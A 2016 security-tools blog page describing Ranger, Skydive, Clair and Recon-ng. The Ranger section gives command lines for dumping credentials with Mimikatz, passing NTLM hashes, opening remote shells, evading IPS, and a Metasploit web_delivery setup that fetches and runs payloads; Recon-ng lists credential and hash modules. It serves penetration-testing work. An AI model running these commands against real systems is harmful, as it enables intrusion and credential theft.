
Monday, April 18, 2016

Ranger - Tool To Access And Interact With Remote Microsoft Windows Based Systems


A tool to help security professionals access and interact with remote Microsoft Windows based systems. 
This project was conceptualized with a simple thought process: we did not invent the bow or the arrow, just a more efficient way of using them. 
Ranger is a command-line driven attack and penetration testing tool which has the ability to use an instantiated catapult server to deliver capabilities against Windows systems. As long as a user has a set of credentials or a hash set (NTLM, LM, LM:NTLM), he or she can gain access to systems that are part of the same trust. 
Using this capability a security professional can extract credentials out of memory in clear text, access SAM tables, run commands, and execute PowerShell scripts, Windows binaries, and other tools. 
At this time the tool bypasses the majority of IPS vendor solutions unless they have been custom tuned to detect it. The tool was developed in our home labs in an effort to support security professionals doing legally and/or contractually supported activities. 
More functionality is being added, but at this time the tool builds on community contributions from the PowerShell PowerView, PowerShell Mimikatz, and Impacket projects.



Managing Ranger: 

Install: 
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh

Update: 
ranger --update

Usage: 
  • Ranger uses a combination of methods and attacks; a method is used to deliver an attack or command
  • An attack is what you are trying to accomplish
  • Some items are both a method and an attack rolled into one, and some methods cannot use some of the attacks due to current limitations in the libraries or protocols (see the example after this list)
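For example, the --wmiexec method can deliver the --invoker attack, which injects the PowerShell Mimikatz payload into memory on the target (the account, domain, and target below are placeholders):
ranger.py -u Administrator -p Password1 -d Domain -t 192.168.195.10 --wmiexec --invoker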

Methods & Attacks: 
--scout
--secrets-dump

Method: 
--wmiexec
--psexec
--atexec

Attack: 
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access

Command Execution: 

Find Logged In Users: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout

SMBEXEC Command Shell: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv

PSEXEC Command Shell: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv

PSEXEC Command Execution: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv

WMIEXEC Command Execution: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"

WMIEXEC PowerShell Mimikatz Memory Injector: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker

WMIEXEC Metasploit web_delivery Memory Injector (requires Metasploit config see below): 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader

WMIEXEC Custom Code Memory Injector: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c "binary.exe"

ATEXEC Command Execution: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder

ATEXEC PowerShell Mimikatz Memory Injector: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec --invoker --no-encoder

ATEXEC Metasploit web_delivery Memory Injector (requires Metasploit config see below): 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec --downloader --no-encoder

ATEXEC Custom Code Memory Injector: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec --executor -c "binary.exe" --no-encoder

SECRETSDUMP Remote Hash and Credential Dump: 
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump

Create Pasteable Mimikatz Attack: 
ranger.py --invoker -q -v -vv -vvv

Create Pasteable web_delivery Attack (requires Metasploit config see below): 
ranger.py --downloader -q -v -vv -vvv

Create Pasteable Executor Attack: 
ranger.py --executor -q -v -vv -vvv

Identifying Group Members and Domains: 
  • When identifying groups, make sure to determine what the actual query domain is with the --get-domain-membership attack
  • Then, when you query a group, use the optional --domain option, which allows you to target a different domain than the one you logged into
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"

Notes About Usage: 

Cred File Format: 
  • You can pass it a list of usernames and passwords or hashes in the following formats, all in the same file (a sample file follows this list):
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP
username password domain
username LM:NTLM domain
username :NTLM  domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain
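A small illustrative credential file mixing these formats might look like this (the accounts, hashes, and domain are placeholders; the hash values shown are the well-known empty LM/NT hashes):
Administrator Password1
svc_sql aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 CORP.LOCAL
backup :31d6cfe0d16ae931b73c59d7e0c089c0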

Credential File Caveats: 
  • If you provide domain names in the file they will be used instead of the default WORKGROUP. 
  • If you supply the domain name on the command line with -d, the tool will infer that you want to ignore all the domain names in the file.

Command Line Execution: 
  • If you do not want to use a file, you can pass the details directly on the command line.
  • If you wish to supply hashes instead of passwords, just pass them through the password argument. 
  • If they are in PWDUMP format and you supply no username, it will pull the username out of the hash. 
  • If you do supply a username, it will assume the same hash applies to the user you specified instead.
  • Use one of the following formats for the password (an example command follows the list):
password
LM:NTLM
:NTLM
PWDUMP
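For example, to authenticate with an LM:NTLM hash instead of a password (the hash and target below are placeholders), something like:
ranger.py -u Administrator -p aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -d Domain -t 192.168.195.10 --wmiexec -c "whoami"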

Targets and Target Lists: 
  • You can provide a list of targets either by using a target list file or through the target option. 
  • You can supply multiple target list files by comma separating them; the tool aggregates the data, removes duplicates, and then excludes your own IP address on the default interface (or the interface you provide).
  • The tool accepts CIDR notation, small ranges (192.168.195.1-100), large ranges (192.168.194.1-192.163.1.1), and single IP addresses. 
  • Again, just comma-separate them on the command line or put them in a newline-delimited file (see the example below).
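A sketch mixing these notations on one command line, assuming the -t option accepts the same comma-separated forms described above (addresses are placeholders):
ranger.py -u Administrator -p Password1 -d Domain -t 192.168.195.0/24,192.168.194.1-100,10.0.0.5 --scout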

Exclusions and Exclusion Lists: 
  • You can exclude targets using the exclude arguments as well; if you need to carve a small Class C range out of a larger Class A scope, the tool will figure that out for you.

Intrusion Prevention Systems (IPS): 
  • Mimikatz, Downloader and Executor use PowerShell memory injection by calling other services and protocols.
  • The commands are double encoded and bypass current IPS solutions (even next-gen) unless specifically tuned to catch these attacks. 
  • ATEXEC is the only one that currently lands on disk and does not encode; I still have some rewriting to do there.

Web_delivery attacks: 
  • To set up Metasploit for the web_delivery exploit, start Metasploit and configure the module to meet the following conditions.
use exploit/multi/script/web_delivery
set targets 2
set payload <choose your desired payload>
set lhost <your IP>
set lport <port for the shell make sure it is not a conflicting port>
set URIPATH /
set SRVPORT <the same as what is set by the -r option in ranger, defaults to 8888>
exploit -j
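With the handler running, point ranger at it; the -r option mentioned above tells ranger which port the web_delivery server is listening on (target and port below are placeholders):
ranger.py -u Administrator -p Password1 -d Domain -t 192.168.195.10 --wmiexec --downloader -r 8888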

FAQ 

Access Denied Errors for SMBEXEC and WMIEXEC 
I'm getting access denied errors in Windows machines that are part of a WORKGROUP. 
When not part of a domain, Windows by default does not have any administrative shares, and SMBEXEC relies on shares being enabled. Additionally, WMIC isn't enabled on WORKGROUP machines. SMBEXEC and WMIEXEC are made to target protocols enabled on domain systems. While it's certainly possible to enable these functions on a WORKGROUP system, note that you are introducing vulnerable protocols (after all, that's what this tool is made to attack). Enabling these features on the primary home system your significant other also uses for Facebook is probably not the best idea. 
  • Make sure this is a test box you own. You can force the shares to be enabled by following the instructions here: http://www.wintips.org/how-to-enable-admin-shares-windows-7/
  • If you want to determine what shares are exposed and then target them, you can use a tool like enum4linux and then use the --share share_name argument in ranger to try to execute SMBEXEC (a short example follows this list).
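A sketch of that workflow against a test box you own. The registry tweak shown is the commonly used LocalAccountTokenFilterPolicy change for remote administrative share access and is an assumption here, not something the linked article or ranger performs for you. On the Windows test box (elevated prompt):
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
Then, from the attacking host, enumerate the exposed shares and target one (the address and share name are placeholders):
enum4linux -a 192.168.195.10
ranger.py -u Administrator -p Password1 -t 192.168.195.10 --smbexec --share ADMIN$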

Future Features: 

Nmap: 
  • The nmap XML feed is still in DRAFT and it is not functioning yet.

Credential Parsing: 
  • Cleaner credential parsing, with output dumped to files, is in development.

Colored Output: 
  • Add colored output with https://pypi.python.org/pypi/colorama

Presented At: 
BSides Charm City 2016: April 23, 2016 

Distributions the tool is a part of: 
Black Arch Linux 


 

skydive — Open Source Real Time Network Analyzer




Open Source Real Time Network Topology and Protocols Analyzer

Skydive is an open source real-time network topology and protocols analyzer. It aims to provide a comprehensive way of understanding what is happening in the network infrastructure. Skydive agents collect topology information and flows and forward them to a central agent for further analysis. All the information is stored in an Elasticsearch database. Skydive is SDN-agnostic but provides SDN drivers in order to enhance the topology and flow information. Currently only the Neutron driver is provided, but more drivers will come soon.

Topology Probes

Topology probes currently implemented:
  • OVSDB
  • NetLINK
  • NetNS
  • Ethtool

Flow Probes

Flow probes currently implemented:
  • sFlow


[Figure: Skydive architecture]

Dependencies

  • Go >= 1.5
  • Elasticsearch >= 2.0

Install

Make sure you have a working Go environment. Then make sure you have Godep installed.
$ go get github.com/redhat-cip/skydive/cmd/skydive



Skydive relies on two main components:
  • skydive agent, which has to be started on each node where topology and flow information will be captured
  • skydive analyzer, the node that collects the data captured by the agents

Configuration

For a single-node setup, the configuration file is optional. For a multi-node setup, the analyzer IP/port needs to be adapted. Processes are bound to 127.0.0.1 by default; you can explicitly change the binding address with “listen: 0.0.0.0:port” in the proper configuration sections. See the full list of configuration parameters in the sample configuration file etc/skydive.yml.default.
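A minimal sketch of such a configuration, assuming the agent/analyzer section layout and key names from the sample file (the addresses and port numbers are illustrative; verify against etc/skydive.yml.default before use):
analyzer:
  listen: 0.0.0.0:8082

agent:
  listen: 0.0.0.0:8081
  analyzers: 192.168.0.10:8082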

Start

$ skydive agent [--conf etc/skydive.yml]
$ skydive analyzer [--conf etc/skydive.yml]

WebUI

To access the WebUI of agents or the analyzer:
http://<address>:<port>


Skydive client

Skydive client can be used to interact with Skydive Analyzer and Agents. Running it without any command will return all the commands available.
$ skydive client

Usage:
  skydive client [command]

Available Commands:
  alert       Manage alerts
  capture     Manage captures

Flags:
  -h, --help[=false]: help for client
      --password="": password auth parameter
      --username="": username auth parameter
Specifying the subcommand will give the usage of the subcommand.
$ skydive client capture
If an authentication mechanism is defined in the configuration file, the username and password parameters have to be used for each command. The environment variables SKYDIVE_USERNAME and SKYDIVE_PASSWORD can be used as default values for the username/password command-line parameters.
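For example (the values below are placeholders):
$ export SKYDIVE_USERNAME=admin
$ export SKYDIVE_PASSWORD=secret
$ skydive client capture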


Start Flow captures

Skydive client allows you to start flow captures on topology nodes/interfaces.
$ skydive client capture create -p <probe path>
The probe path parameter references the interfaces where the flow probe will be started, i.e. where the capture will be done. The format of a probe path follows the links between topology nodes from a host node to a target node:
host1[Type=host]/.../node_nameN[Type=node_typeN]
The node name can be the name of:
  • a host
  • an interface
  • a namespace
The node types can be:
  • host
  • netns
  • ovsbridge
Currently supported target node types are:
  • ovsbridge
  • veth
  • device
  • internal
  • tun
  • bridge
To start a capture on the OVS bridge br1 on the host host1, the following probe path is used:
$ skydive client capture create -p "host1[Type=host]/br1[Type=ovsbridge]"
A wildcard for the host node can be used in order to start a capture on all hosts.
$ skydive client capture create -p "*/br1[Type=ovsbridge]"
A capture can be defined in advance and will start when a topology node matches it.
To delete a capture:
$ skydive client capture delete <probe path>

API

Topology information is accessible through an HTTP or a WebSocket API.
HTTP endpoint:
curl http://<address>:<port>/api/topology
WebSocket endpoint:
ws://<address>:<port>/ws/graph
Messages:
  • NodeUpdated
  • NodeAdded
  • NodeDeleted
  • EdgeUpdated
  • EdgeAdded
  • EdgeDeleted

Source && Download

https://github.com/redhat-cip/skydive

clair — Vulnerability Static Analysis for Containers


Clair is an open source project for the static analysis of vulnerabilities in appc and docker containers.


Vulnerability data is continuously imported from a known set of sources and correlated with the indexed contents of container images in order to produce lists of vulnerabilities that threaten a container. When vulnerability data changes upstream, the previous state and new state of the vulnerability along with the images they affect can be sent via webhook to a configured endpoint. All major components can be customized programmatically at compile-time without forking the project.
Clair's goal is to enable a more transparent view of the security of container-based infrastructure. Thus, the project was named Clair after the French term which translates to clear, bright, transparent.

Common Use Cases



Manual Auditing

You’re building an application and want to depend on a third-party container image that you found by searching the internet. To make sure that you do not knowingly introduce a new vulnerability into your production service, you decide to scan the container for vulnerabilities. You docker pull the container to your development machine and start an instance of Clair. Once it finishes updating, you use the local image analysis tool to analyze the container. You realize this container is vulnerable to many critical CVEs, so you decide to use another one.
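A sketch of that workflow, assuming the contrib analyze-local-images helper from the Clair repository is used as the local analysis tool (check the repository for the current tool name and flags; the image name is a placeholder):
$ go get -u github.com/coreos/clair/contrib/analyze-local-images
$ docker pull example/image:latest
$ analyze-local-images example/image:latest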

Container Registry Integration

Your company has a continuous-integration pipeline and you want to stop deployments if they introduce a dangerous vulnerability. A developer merges some code into the master branch of your codebase. The first step of your continuous-integration pipeline automates the testing and building of your container and pushes a new container to your container registry. Your container registry notifies Clair which causes the download and indexing of the images for the new container. Clair detects some vulnerabilities and sends a webhook to your continuous deployment tool to prevent this vulnerable build from seeing the light of day.


Vulnerability Static Analysis for Containers

During the first run, Clair will bootstrap its database with vulnerability data from its data sources. It can take several minutes before the database has been fully populated.
NOTE: These setups are not meant for production workloads, but as a quick way to get started.

Docker Compose

An easy way to get an instance of Clair running is to use Docker Compose to run everything locally. This runs a PostgreSQL database insecurely and locally in a container. This method should only be used for testing.
$ curl -L https://raw.githubusercontent.com/coreos/clair/master/docker-compose.yml -o $HOME/docker-compose.yml
$ mkdir $HOME/clair_config
$ curl -L https://raw.githubusercontent.com/coreos/clair/master/config.example.yaml -o $HOME/clair_config/config.yaml
$ $EDITOR $HOME/clair_config/config.yaml # Edit database source to be postgresql://postgres:password@postgres:5432?sslmode=disable
$ docker-compose -f $HOME/docker-compose.yml up -d
Docker Compose may start Clair before Postgres which will raise an error. If this error is raised, manually execute docker start clair_clair.

Docker

This method assumes you already have a PostgreSQL 9.4+ database running. This is the recommended method for production deployments.
$ mkdir $HOME/clair_config
$ curl -L https://raw.githubusercontent.com/coreos/clair/master/config.example.yaml -o $HOME/clair_config/config.yaml
$ $EDITOR $HOME/clair_config/config.yaml # Add the URI for your postgres database
$ docker run -d -p 6060-6061:6060-6061 -v $HOME/clair_config:/config quay.io/coreos/clair -config=/config/config.yaml

Source

To build Clair, you need the latest stable version of Go and a working Go environment. In addition, Clair requires that bzr, rpm, and xz be available on the system $PATH.
$ go get github.com/coreos/clair
$ go install github.com/coreos/clair/cmd/clair
$ $EDITOR config.yaml # Add the URI for your postgres database
$ $GOBIN/clair -config=config.yaml


Architecture

[Figure: Clair architecture diagram]

Terminology

  • Image – a tarball of the contents of a container
  • Layer – an appc or Docker image that may or may not be dependent on another image
  • Detector – a Go package that identifies the content, namespaces and features from a layer
  • Namespace – a context around features and vulnerabilities (e.g. an operating system)
  • Feature – anything that when present could be an indication of a vulnerability (e.g. the presence of a file or an installed software package)
  • Fetcher – a Go package that tracks an upstream vulnerability database and imports its contents into Clair

Vulnerability Analysis

There are two major ways to perform analysis of programs: Static Analysis and Dynamic Analysis. Clair has been designed to perform static analysis; containers never need to be executed. Rather, the filesystem of the container image is inspected and features are indexed into a database. By indexing the features of an image into the database, images only need to be rescanned when new detectors are added.

Default Data Sources

Data Source                  | Versions                                                | Format
Debian Security Bug Tracker  | 6, 7, 8, unstable                                       | dpkg
Ubuntu CVE Tracker           | 12.04, 12.10, 13.04, 14.04, 14.10, 15.04, 15.10, 16.04  | dpkg
Red Hat Security Data        | 5, 6, 7                                                 | rpm

Customization

The major components of Clair are all programmatically extensible in the same way Go’s standard database/sql package is extensible.
Custom behavior can be accomplished by creating a package that contains a type that implements an interface declared in Clair and registering that interface in init(). To expose the new behavior, unqualified imports to the package must be added in your main.go, which should then start Clair using Boot(*config.Config).
The following interfaces can have custom implementations registered via init() at compile time:
  • Datastore – the backing storage
  • Notifier – the means by which endpoints are notified of vulnerability changes
  • Fetcher – the sources of vulnerability data that is automatically imported
  • MetadataFetcher – the sources of vulnerability metadata that is automatically added to known vulnerabilities
  • DataDetector – the means by which contents of an image are detected
  • FeatureDetector – the means by which features are identified from a layer
  • NamespaceDetector – the means by which a namespace is identified from a layer

Source && Download


https://github.com/coreos/clair

Recon-ng – Web Reconnaissance Framework

Recon-ng is a full-featured Web Reconnaissance Framework written in Python. Complete with independent modules, database interaction, interactive help, and command completion – Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.
Recon-ng - Web Reconnaissance Framework
Recon-ng has a look and feel, and even a command flow, similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. It is, of course, quite different: Recon-ng is not designed to compete with existing frameworks, as it is intended exclusively for web-based open source reconnaissance.
If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct passive reconnaissance, use Recon-ng!

An example of active reconnaissance would be Skipfish by the Google Security Team.
Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Each module is a subclass of the “module” class. The “module” class is a customized “cmd” interpreter equipped with built-in functionality that provides simple interfaces to common tasks such as standardizing output, interacting with the database, making web requests, and managing API keys. Therefore, all the hard work has been done. Building modules is simple and takes little more than a few minutes.
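A quick illustrative session following that Metasploit-style command flow (the module path, prompt format, and domain shown are examples, not drawn from this article):
$ ./recon-ng
[recon-ng][default] > use recon/domains-hosts/bing_domain_web
[recon-ng][default][bing_domain_web] > set SOURCE example.com
[recon-ng][default][bing_domain_web] > run
[recon-ng][default][bing_domain_web] > show hosts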

Modules

Recon-ng comes with ~80 recon modules, 2 discovery modules, 2 exploitation modules, 7 reporting modules and 2 import modules.
  • cache_snoop – DNS Cache Snooper
  • interesting_files – Interesting File Finder
  • command_injector – Remote Command Injection Shell Interface
  • xpath_bruter – Xpath Injection Brute Forcer
  • csv_file – Advanced CSV File Importer
  • list – List File Importer
  • point_usage – Jigsaw – Point Usage Statistics Fetcher
  • purchase_contact – Jigsaw – Single Contact Retriever
  • search_contacts – Jigsaw Contact Enumerator
  • jigsaw_auth – Jigsaw Authenticated Contact Enumerator
  • linkedin_auth – LinkedIn Authenticated Contact Enumerator
  • github_miner – Github Resource Miner
  • whois_miner – Whois Data Miner
  • bing_linkedin – Bing Linkedin Profile Harvester
  • email_validator – SalesMaple Email Validator
  • mailtester – MailTester Email Validator
  • mangle – Contact Name Mangler
  • unmangle – Contact Name Unmangler
  • hibp_breach – Have I been pwned? Breach Search
  • hibp_paste – Have I been pwned? Paste Search
  • pwnedlist – PwnedList Validator
  • migrate_contacts – Contacts to Domains Data Migrator
  • facebook_directory – Facebook Directory Crawler
  • fullcontact – FullContact Contact Enumerator
  • adobe – Adobe Hash Cracker
  • bozocrack – PyBozoCrack Hash Lookup
  • hashes_org – Hashes.org Hash Lookup
  • leakdb – leakdb Hash Lookup
  • metacrawler – Meta Data Extractor
  • pgp_search – PGP Key Owner Lookup
  • salesmaple – SalesMaple Contact Harvester
  • whois_pocs – Whois POC Harvester
  • account_creds – PwnedList – Account Credentials Fetcher
  • api_usage – PwnedList – API Usage Statistics Fetcher
  • domain_creds – PwnedList – Pwned Domain Credentials Fetcher
  • domain_ispwned – PwnedList – Pwned Domain Statistics Fetcher
  • leak_lookup – PwnedList – Leak Details Fetcher
  • leaks_dump – PwnedList – Leak Details Fetcher
  • brute_suffix – DNS Public Suffix Brute Forcer
  • baidu_site – Baidu Hostname Enumerator
  • bing_domain_api – Bing API Hostname Enumerator
  • bing_domain_web – Bing Hostname Enumerator
  • brute_hosts – DNS Hostname Brute Forcer
  • builtwith – BuiltWith Enumerator
  • google_site_api – Google CSE Hostname Enumerator
  • google_site_web – Google Hostname Enumerator
  • netcraft – Netcraft Hostname Enumerator
  • shodan_hostname – Shodan Hostname Enumerator
  • ssl_san – SSL SAN Lookup
  • vpnhunter – VPNHunter Lookup
  • yahoo_domain – Yahoo Hostname Enumerator
  • zone_transfer – DNS Zone File Harvester
  • ghdb – Google Hacking Database
  • punkspider – PunkSPIDER Vulnerability Finder
  • xssed – XSSed Domain Lookup
  • xssposed – XSSposed Domain Lookup
  • migrate_hosts – Hosts to Domains Data Migrator
  • bing_ip – Bing API IP Neighbor Enumerator
  • freegeoip – FreeGeoIP
  • ip_neighbor – My-IP-Neighbors.com Lookup
  • ipinfodb – IPInfoDB GeoIP
  • resolve – Hostname Resolver
  • reverse_resolve – Reverse Resolver
  • ssltools – SSLTools.com Host Name Lookups
  • geocode – Address Geocoder
  • reverse_geocode – Reverse Geocoder
  • flickr – Flickr Geolocation Search
  • instagram – Instagram Geolocation Search
  • picasa – Picasa Geolocation Search
  • shodan – Shodan Geolocation Search
  • twitter – Twitter Geolocation Search
  • whois_orgs – Whois Company Harvester
  • reverse_resolve – Reverse Resolver
  • shodan_net – Shodan Network Enumerator
  • census_2012 – Internet Census 2012 Lookup
  • sonar_cio – Project Sonar Lookup
  • migrate_ports – Ports to Hosts Data Migrator
  • dev_diver – Dev Diver Repository Activity Examiner
  • linkedin – Linkedin Contact Crawler
  • linkedin_crawl – Linkedin Profile Crawler
  • namechk – NameChk.com Username Validator
  • profiler – OSINT HUMINT Profile Collector
  • twitter – Twitter Handles
  • github_repos – Github Code Enumerator
  • gists_search – Github Gist Searcher
  • github_dorks – Github Dork Analyzer
  • csv – CSV File Creator
  • html – HTML Report Generator
  • json – JSON Report Generator
  • list – List Creator
  • pushpin – PushPin Report Generator
  • xlsx – XLSX File Creator
  • xml – XML Report Generator

Dependencies

All third-party libraries/packages should be installed prior to use. The framework checks for the presence of the required dependencies at runtime and disables any modules affected by missing dependencies.
You can download Recon-ng here:
To install:
  • Change into the Recon-ng directory.
  • Install dependencies (a sketch follows).
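A sketch of those steps, assuming the repository has already been cloned and that the dependency file uses the project's conventional REQUIREMENTS name (verify against the repository):
$ cd recon-ng
$ pip install -r REQUIREMENTS
$ ./recon-ng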